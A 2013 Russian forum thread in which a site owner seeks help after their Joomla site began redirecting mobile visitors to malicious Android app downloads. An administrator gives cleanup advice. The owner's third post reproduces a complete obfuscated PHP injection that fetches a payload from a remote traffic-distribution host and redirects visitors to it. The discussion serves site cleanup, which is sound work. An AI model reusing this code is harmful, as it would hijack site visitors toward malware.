Форум программистов, компьютерный форум, киберфорум
Безопасность сайтов и серверов
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.83/6: Рейтинг темы: голосов - 6, средняя оценка - 4.83
96 / 96 / 21
Регистрация: 25.04.2012
Сообщений: 441
1

взломали сайт (только мобильную версию)

08.10.2013, 11:33. Просмотров 1078. Ответов 7
Метки нет (Все метки)


случайно зашел на сайт с телефона, и началось скачивание приложения, я удивился, запустил установку, стал просматривать запрашиваемые права - отправка платных сообщений и чтение и тд
каждый раз скачиваются разные приложения (то якобы часы, то виджеты погоды и тд)

как излечить? с чего начать? отдельной мобильной версии сайта нету
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
08.10.2013, 11:33
Ответы с готовыми решениями:

Взломали сайт
Всем привет. Сегодня утром при переходе на сайт обнаружил следующую картину: изображение медвежонка...

Взломали сайт
Всем привет, у меня недавно был взломан сайт. Захожу на свой сайт и вижу там: Hacked by...

Взломали сайт на joomla
Взломали сайт помогите восстановить сайт http://cto-avto.com/

Взломали сайт. Как найти вредоносное содержимое?
Я - не программист. Сайты делала сама методом научного тыка. Мне приостановили хостинг, так как...

7
Администратор
11858 / 5163 / 261
Регистрация: 05.04.2011
Сообщений: 13,922
Записей в блоге: 2
09.10.2013, 18:15 2
Tiva, на чем сайт сделан? Начните с .htaccess и с индексного файла. Где-то стоит редирект для мобильников.
1
96 / 96 / 21
Регистрация: 25.04.2012
Сообщений: 441
15.10.2013, 14:14  [ТС] 3
Цитата Сообщение от Taatshi Посмотреть сообщение
Tiva, на чем сайт сделан? Начните с .htaccess и с индексного файла. Где-то стоит редирект для мобильников.
сайт на джумле 1.5
почитал, понял что это стоит редирект, зашифрован в base64 и раскидан по многим файлам

удалил парочку зараженных
eval(base64decode("...
и далее длинная шифрованная строка, в которой прописан редирект с поисковиков и тд

на том же форуме, где прочитал это, написано, что файлы вот с таким содержанием, так же - вирусы
надо ли удалять такие файлы? их намного больше чем с eval
PHP
1
<? $GLOBALS['_1721311675_']=Array(base64_decode('' .'c2V0X3R' .'pb' .'W' .'V' .'fbGltaXQ='),base64_decode('ZGlybmF' .'tZQ=='),base64_decode('ZmlsZV9nZXRf' .'Y29' .'u' .'dGVudHM='),base64_decode('' .'c3R' .'ybGVu'),base64_decode('' .'dGltZQ' .'=='),base64_decode('ZmlsZW' .'1' .'0aW1l'),base64_decode('YmFzZ' .'TY0X' .'2R' .'lY29kZQ=='),base64_decode('Zml' .'sZ' .'V9' .'nZXRfY29u' .'dGVudHM' .'='),base64_decode('' .'c' .'3Ry' .'b' .'GVu'),base64_decode('Zm9wZW4='),base64_decode('ZnB' .'1' .'dH' .'M='),base64_decode('' .'ZmNsb' .'3' .'Nl'),base64_decode('aGVh' .'ZGVy')); ?><? function _447979436($i){$a=Array('L2xpbmsuY2FjaGU=','aHR0cDovL2h0LXRkczcuaW4vbGluay5waHA/cXFxPTQ4NzU3OA==','dw==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_1721311675_'][0](round(0+6+6+6+6+6));$_0=$GLOBALS['_1721311675_'][1](__FILE__) ._447979436(0);$_1=@$GLOBALS['_1721311675_'][2]($_0);if($GLOBALS['_1721311675_'][3]($_1)<round(0+20)||($GLOBALS['_1721311675_'][4]()-@$GLOBALS['_1721311675_'][5]($_0))>round(0+15+15+15+15)){$_1=$GLOBALS['_1721311675_'][6](@$GLOBALS['_1721311675_'][7](_447979436(1)));if($GLOBALS['_1721311675_'][8]($_1)>round(0+20)){$_2=@$GLOBALS['_1721311675_'][9]($_0,_447979436(2));@$GLOBALS['_1721311675_'][10]($_2,$_1);@$GLOBALS['_1721311675_'][11]($_2);}}$GLOBALS['_1721311675_'][12](_447979436(3) .$_1);exit; ?>
0
Администратор
11858 / 5163 / 261
Регистрация: 05.04.2011
Сообщений: 13,922
Записей в блоге: 2
15.10.2013, 14:22 4
надо.

Определить просто всегда. Берете исходный файл - из установочного архива с джумлой или расширения - и сравниваете с зараженным.

Добавлено через 1 минуту
Цитата Сообщение от Tiva Посмотреть сообщение
удалил парочку зараженных
надеюсь, не файлы целиком, а только код из них

И поищите поиском по файлам с текстом - он может быть прописан где угодно.
0
96 / 96 / 21
Регистрация: 25.04.2012
Сообщений: 441
15.10.2013, 14:58  [ТС] 5
Цитата Сообщение от Taatshi Посмотреть сообщение
надо.

Определить просто всегда. Берете исходный файл - из установочного архива с джумлой или расширения - и сравниваете с зараженным.

Добавлено через 1 минуту

надеюсь, не файлы целиком, а только код из них

И поищите поиском по файлам с текстом - он может быть прописан где угодно.
если в файле только вредоносных код, файл надо оставить пустым?
0
Администратор
11858 / 5163 / 261
Регистрация: 05.04.2011
Сообщений: 13,922
Записей в блоге: 2
15.10.2013, 15:29 6
Если только вредоносный - удалять конечно же.
1
96 / 96 / 21
Регистрация: 25.04.2012
Сообщений: 441
15.10.2013, 15:31  [ТС] 7
Цитата Сообщение от Taatshi Посмотреть сообщение
Если только вредоносный - удалять конечно же.
в общем, удалил строчки кода eval(base64_decode("code")); и пару файлов с кодом, что на 1 пост выше.
больше ничего такого в каталоге нет вообще. .htaccess чистый

что надо еще сделать, чтоб не было редиректа?
0
Администратор
11858 / 5163 / 261
Регистрация: 05.04.2011
Сообщений: 13,922
Записей в блоге: 2
15.10.2013, 16:06 8
Самое главное - найти уязвимость и закрыть. Раз изменены файлы - есть бэкдор. Вот его и надо искать. Не спрашивайте - где он - может быть где угодно.
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
15.10.2013, 16:06

Заказываю контрольные, курсовые, дипломные и любые другие студенческие работы здесь или здесь.

Взломали сайт и используют для взлома других сайтов :(
Имеется VPS. В ATOP Заметил что выросла нагрузка на проц и память. В процессах увидел Python. ...

Сайт на оценку. Не могу придумать мобильную версию
Привет друзья. Пишу сайт для РА, по их макету. Макет сам по себе уникальный ( ну я не разу не видел...

Не получается адаптировать сайт html под мобильную версию
не получается адаптировать сайт html под мобильную версию, ребят, кто может помочь, прошу, очень...

В социальные сети заходит , только через мобильную версию
Вообщем вопрос такой , конкретно (в контакте и одноклассники) начало заходит через мобильную...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
8
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2021, vBulletin Solutions, Inc.